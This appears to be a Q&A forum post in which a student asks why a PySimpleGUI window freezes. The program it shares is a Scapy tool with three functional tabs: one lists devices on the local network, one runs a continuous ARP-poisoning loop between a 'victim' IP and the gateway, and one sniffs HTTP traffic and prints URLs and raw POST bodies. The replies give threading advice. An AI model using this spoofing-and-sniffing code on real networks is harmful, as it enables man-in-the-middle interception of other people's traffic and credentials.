# How can I solve stuck problems when click on button with pysimpleGUI, and show output in Multiline?

Tags: python, scapy, arp, pysimplegui

I'm doing a Sniffer in Python, using Scapy and pysimpleGUI and 4 Tabs; the last 2 tabs are the most important (ARP Spoofer and Network Sniffer); I have some problems right now:

1. I want to show the output data in Multiline but no in Terminal.
2. When I use sg.Output () it shows data in element (desired), but I have to use 2 or 3 outputs element but I only can use one in the project (I dont know why that restriction, I'm new), then, I dont know why it works in the second tab (show data in Multiline), but not in the 3rd and fourth.
3. When I click the button in the 3rd tab (Begin ARP Spooffer), it stuck and no let me click the 4th tab to begin sniffing:
   There is the python code, any help I will thanks:

```html
import PySimpleGUI as sg
import scapy
import time
import socket
import scapy.all as scapy
from scapy.layers.inet import IP
from scapy.sendrecv import sniff
from scapy.layers.http import HTTPRequest
from scapy.all import ARP, Ether, srp, Raw


#Obtener IP del host que inicia el sniffer.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))

# Contenido de la ventana

layout0 = [ [sg.Text("IP local"), sg.Text(s.getsockname()[0])],
            [sg.Button('Listar dispositivos')],
            [sg.Multiline(size=(110,10), key="-LISTIP-")]
            ]

layout1 = [ [sg.Text("IP"), sg.Text(s.getsockname()[0])],
            [sg.Text("MAC")],
            [sg.Text("IP de la víctima"), sg.Input(default_text="192.168.0.", key='-USUARIO-')],
            [sg.Text("IP del gateway"), sg.Input(default_text="192.168.0.1", key='-ENLACE-')],
            [sg.Text("Puerto"), sg.Input()],
            [sg.Button('Iniciar ARP')],
            [sg.Multiline(size=(110,10), key='-SCANARP-')]]

layout2 = [ [sg.Button('Iniciar Sniffer')],
            [sg.Multiline(size=(110,10), key='-DOSNIFF-')]
            ]
layout3 = [ [sg.Text("Este programa ha sido realizado para poner en práctica los conceptos aprendidos durante la clase de Gestión y Auditoría de Redes. Úselo bajo su responsabilidad.")],
            [sg.Button('Comenzar')]
            ]

layout = [
            [
            sg.TabGroup([[ 
                            sg.Tab('Aviso', layout3),
                            sg.Tab('Dispositivos', layout0),
                            sg.Tab('ARP Spoof', layout1),
                            sg.Tab('Network Sniffer', layout2)            
                ]])],
            [sg.CloseButton("Salir")]
            ]

window = sg.Window('Ethical Hacking - Monitor de red').Layout(layout)

while True:
    event, values= window.read() # Leer los valores de los input y keys de otros elementos.
    if event == sg.WIN_CLOSED or event == 'Salir':
            window.Close()
            break
    elif event == 'Listar dispositivos':
        target_ip = "192.168.0.1/24"
        # mascara="/24"
        #target_ip =str(values[0])+mascara
        #print (target_ip)

        arp = ARP(pdst=target_ip)

        ether = Ether(dst="ff:ff:ff:ff:ff:ff")

        packet = ether/arp

        result = srp(packet, timeout=3, verbose=0)[0]


        clients = []

        for sent, received in result:

            clients.append({'ip': received.psrc, 'mac': received.hwsrc})

        window['-LISTIP-'].print("Dispositivos que respondieron en la red:")
        window['-LISTIP-'].print("IP" + " "*18+"MAC", text_color='red', background_color='yellow')
        for client in clients:
            window['-LISTIP-'].print("{:16}    {}".format(client['ip'], client['mac']), text_color='white', background_color='black')
    
    elif event=='Iniciar ARP':
        def mac(ip):
            arp_request = scapy.ARP(pdst = ip)
            broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff")
            arp_request_broadcast = broadcast / arp_request
            answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
            #return answered_list[0][1].hwsrc
        
        def spoof(target_ip, spoof_ip):
            packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = mac(target_ip), psrc = spoof_ip)
            window.Element('-SCANARP-').Update(packet.show())
            window.Element('-SCANARP-').Update(packet.summary())    
            scapy.send(packet, verbose = False)  
        
        try:
            sent_packets_count = 0
            #print("Ip de la victima")
            victima = values['-USUARIO-']
            #print("Gateway")
            gateway = values['-ENLACE-']
            while True:
                window.Element('-SCANARP-').Update("IP Victima "+str(victima)+" IP Hacker "+str(gateway))
                spoof(victima, gateway)
                window.Element('-SCANARP-').Update("IP Hacker "+str(gateway)+" IP Victima "+str(victima))
                spoof(gateway, victima)
                time.sleep(2) # Esperar (n) segundos
        
        except KeyboardInterrupt:
            print("Terminado")

    elif event=='Iniciar Sniffer':
            
        def sniff_packets(iface=None):
            if iface:
                sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
            else: 
                sniff(filter="port 80", prn=process_packet, store=False)

        def process_packet(packet):
            if packet.haslayer(HTTPRequest):
                url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
                ip = packet[IP].src
                method = packet[HTTPRequest].Method.decode()
                print(f"\n Se ha ingresado a:  {url}  desde la ip:  {ip} ")
                if show_raw and packet.haslayer(Raw) and method == "POST":
                    print(f"\nDatos que pueden ser útiles: {packet[Raw].load}")


        if __name__ == "__main__":
            import argparse
            parser = argparse.ArgumentParser(description="")
            parser.add_argument("-i", "--iface")
            parser.add_argument("--show-raw", dest="show_raw", action="store_true")

            # parse arguments
            args = parser.parse_args()
            iface = args.iface
            show_raw = args.show_raw

            sniff_packets(iface)
# Finalizar            
window.Close()
```

NOTE: excuse my english.

Comment: The Output Element is a re-direction of Stdout. It's better to use sg.Multiline if you need more than one, and use method `sg.Multine.Print` to print the output to a multiline element. Make sure the content to print or update is string and not None. For example, `window.Element('-SCANARP-').Update(packet.show())` is same as `window.Element('-SCANARP-').Update(None)`. If the steps during `window.read` or event loop take long time, it's preferred to use thread, or GUI may show you `No Responding`. Will the while loop under event `'Iniciar ARP'` break ? or not ?

Comment: Hi! How can I create threads? The loop, breaks when hit CTRL+C, or Exit windows.

Comment: `import thread; thread.Threading(target=function_name, args=tuple_of_arguments, daemon=True).start()`. Don't update GUI in threads, but call `window.writw_event_value(event, value)` to generate an event, then handle the event in your event loop to update GUI. Should find the rule when to break from while loop, not only by user keyboard break.

Comment: Ok, bit by bit I'm doing. Thanks.